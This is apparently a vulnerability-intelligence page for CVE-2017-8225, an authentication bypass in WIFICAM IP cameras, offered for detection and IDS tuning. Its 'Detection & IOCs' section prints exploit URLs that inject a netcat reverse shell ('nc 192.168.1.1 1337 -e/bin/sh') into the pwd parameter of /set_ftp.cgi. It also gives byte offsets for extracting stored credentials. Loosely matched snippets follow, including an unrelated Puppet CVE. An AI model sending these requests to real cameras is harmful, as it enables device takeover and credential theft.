CVE-2017-8225
published 2017-04-25CVE-2017-8225: On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by…
PriorityP188critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
17.87%
96.8th percentile
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
Detection & IOCsextracted from sources · hover to see the quote
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
- →Authentication bypass via empty loginuse and loginpas parameters in URI — detect HTTP requests to camera CGI endpoints where both loginuse= and loginpas= are empty strings ↗
- →Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on GoAhead WIFICAM devices for command injection patterns in the pwd= parameter (e.g., subshell syntax such as $(...) or backticks) ↗
- →Detect unauthenticated access to .ini files (e.g., System.ini) on GoAhead WIFICAM devices — these contain plaintext credentials and should never be publicly accessible ↗
- →Check Point IPS protection name for this CVE: 'Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure' — use as a signature reference for network IDS/IPS tuning ↗
- →Check Point IPS protection name for associated RCE: 'Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution' — use as a signature reference for network IDS/IPS tuning ↗
- →Binary pattern in credential extraction: look for the byte sequence 0x0a 0x0a 0x0a 0x0a 0x01 in HTTP responses from camera devices — credentials are located at fixed offsets (+138 bytes for username, +170 bytes for password) after this marker ↗
- ·The exploit hardcodes CAM_PORT 80 as the default attack port, but observed infected GoAhead devices in the wild were found running on port 81 over TCP — scanning/detection should cover both ports ↗
- ·The REMOTE_HOST and REMOTE_PORT values in the exploit (192.168.1.1 / 1337) are placeholder defaults; real-world attacks will use attacker-controlled IPs and arbitrary ports for the reverse shell callback ↗
- ·The vulnerability affects GoAhead-based Wireless IP Camera (P2P) WIFICAM devices; the same IoTroop/IoTReaper botnet campaign also exploited vulnerabilities in D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology devices — detections should not be scoped to GoAhead alone ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5rv8-75v4-fcqc: On Wireless IP Camera (P2P) WIFICAM devices, access to
ghsa_unreviewed·2022-05-13
CVE-2017-8225 [CRITICAL] CWE-522 GHSA-5rv8-75v4-fcqc: On Wireless IP Camera (P2P) WIFICAM devices, access to
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
vulncheck·2017·CVSS 9.8
CVE-2017-8225 [CRITICAL] wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2017/new-iot-botnet-storm-coming/; https://www.radware.com/blog/security/iot_reaper-botnet/; https://blog.netlab.360.com/ddos-botnet-moobot-en/; https://www.researchgate.net/publication/348602660_An_analysis_
No detection rules found.
Checkpoint
A New IoT Botnet Storm is Coming
blogs_checkpoint·2017-10-19
CVE-2017-8225 A New IoT Botnet Storm is Coming
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## A New IoT Botnet Storm is Coming
Key Points:
A massive Botnet is forming to create a cyber-storm that could take down the internet.
An estimated million organizations have already been s
arXiv
HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
arxiv_fulltext·2019-05-03
HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
[HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices]HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
Dominik Breitenbacher
Singapore University of Technology and Design
[email protected]
Ivan Homoliak
Singapore University of Technology and Design
[email protected]
Yan Lin Aung
Singapore University of Technology and Design
[email protected]
Nils Ole Tippenhauer
0000-0001-8424-2602
CISPA Helmholtz Center for Information Security
[email protected]
Yuval Elovici
Singapore University of Technology and Design
[email protected]
## Abstract
Internet of Things (IoT) devices have become ubiquitous and are spread across many application domains including the industry, transportation
Bugzilla
CVE-2017-10690 puppet: Environment leakage in puppet-agent
bugzilla·2018-04-13·CVSS 6.5
CVE-2017-10690 [MEDIUM] CVE-2017-10690 puppet: Environment leakage in puppet-agent
CVE-2017-10690 puppet: Environment leakage in puppet-agent
puppet-agent before version 5.3.4 has an information disclosure vulnerability that allows an agent to retrieve facts from an environment that it was not classified to retrieve from.
External References:
https://puppet.com/security/cve/CVE-2017-10690
Upstream Issue:
https://tickets.puppetlabs.com/browse/PUP-8225
Upstream Patch:
https://github.com/puppetlabs/puppet/commit/bd87bef2c3862d333f4c1f2b148b147d449a375b
Discussion:
Statement:
This issue affects the versions of puppet-agent as shipped with Red Hat Enterprise Satellite 6.3 and later. Red Hat Product Security has rated this issue as having security impact of Moderate. A future update may address this issue. For additional information, refer to the Issue Severity Cl
2017-04-25
Published
Exploited in the wild